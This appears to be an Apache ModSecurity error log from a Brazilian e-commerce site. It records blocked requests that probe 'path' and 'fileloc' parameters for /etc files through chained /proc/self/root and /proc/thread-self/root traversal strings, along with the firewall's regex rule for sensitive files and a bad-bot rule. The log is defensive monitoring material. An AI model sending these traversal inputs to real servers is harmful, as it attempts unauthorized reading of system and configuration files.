[Fri Mar 20 12:30:34.026996 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.241.31:36220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oGvqxLDW4GITHUkQlKAAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:35.367428 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.241.31:36230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oGwF0L0L-SsrnPo6h6AAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:41.087361 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.241.31:36234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oIV1pVZ5mVmJwsFNoHwAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:45.591450 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.241.31:38882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oJTJ3M9BSuKP7CAZkfwAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:46.844469 2026] [:error] [pid 9818:tid 140411708356352] [client 74.7.241.31:38892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oJl1pVZ5mVmJwsFNoIwAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:47.163290 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.117:43882] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1oJxCii7xarUs8iHak1AAAAgs"]
[Fri Mar 20 12:30:48.149614 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:44136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oKAF0L0L-SsrnPo6h9AAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:59.065997 2026] [mime_magic:error] [pid 7235:tid 140411582465792] (70014)End of file found: [client 57.141.18.53:44408] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:31:08.479399 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.241.31:44138] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oPPHIg5MgXLBnicMuSAAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:31:11.227048 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.244.43:44576] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1oPzJ3M9BSuKP7CAZkpAAAAI4"]
[Fri Mar 20 12:31:25.751859 2026] [:error] [pid 31215:tid 140411649607424] [client 216.73.216.191:45304] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1oTQF0L0L-SsrnPo6iFgAAAss"]
[Fri Mar 20 12:31:34.172897 2026] [mime_magic:error] [pid 21219:tid 140411716749056] (70014)End of file found: [client 57.141.18.108:45538] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:31:47.997480 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:49510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oYta6ubjKNq_cu4YX9wAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:31:56.176953 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:45828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1obNa6ubjKNq_cu4YYBwAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:31:58.497035 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.241.31:36022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1obhCii7xarUs8iHak7wAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:31:59.758335 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:36032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1obxCii7xarUs8iHak8AAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:32:02.205614 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.241.31:36036] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ocTJ3M9BSuKP7CAZkyQAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:32:03.643266 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.241.31:36040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ocxCii7xarUs8iHak8QAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:32:04.147049 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.41:46382] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1odF1pVZ5mVmJwsFNoZAAAAE0"]
[Fri Mar 20 12:32:42.553298 2026] [mime_magic:error] [pid 11167:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:47740] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:33:04.373796 2026] [mime_magic:error] [pid 7893:tid 140411624429312] (70014)End of file found: [client 57.141.18.117:49056] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:33:07.741771 2026] [mime_magic:error] [pid 26799:tid 140411641214720] (70014)End of file found: [client 57.141.18.113:49298] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:33:11.093022 2026] [mime_magic:error] [pid 26799:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:49522] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:33:15.278398 2026] [mime_magic:error] [pid 15826:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:49748] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:33:46.969045 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.38:51400] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1o2ta6ubjKNq_cu4YYeAAAA0U"]
[Fri Mar 20 12:33:52.759916 2026] [mime_magic:error] [pid 21219:tid 140411674785536] (70014)End of file found: [client 74.7.243.128:37744] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/firmware/radeon
[Fri Mar 20 12:34:04.040733 2026] [:error] [pid 9818:tid 140411699963648] [client 57.141.18.101:52494] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1o7F1pVZ5mVmJwsFNo9wAAAEU"]
[Fri Mar 20 12:34:04.425388 2026] [mime_magic:error] [pid 10189:tid 140411599251200] (70014)End of file found: [client 57.141.18.112:52508] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:34:04.433781 2026] [mime_magic:error] [pid 11642:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:52510] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:34:07.773876 2026] [mime_magic:error] [pid 11167:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:52786] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:34:09.517780 2026] [mime_magic:error] [pid 11642:tid 140411548894976] (70014)End of file found: [client 57.141.18.2:52920] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:34:38.290361 2026] [mime_magic:error] [pid 26799:tid 140411548894976] (70014)End of file found: [client 57.141.18.2:54818] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:34:41.118619 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.228.61:59904] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1pEDJ3M9BSuKP7CAZlegAAAJI"]
[Fri Mar 20 12:34:45.390735 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:46286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pFRCii7xarUs8iHalwwAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:34:51.300448 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:33868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pG7ninkcc-iUj5AqV4QAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
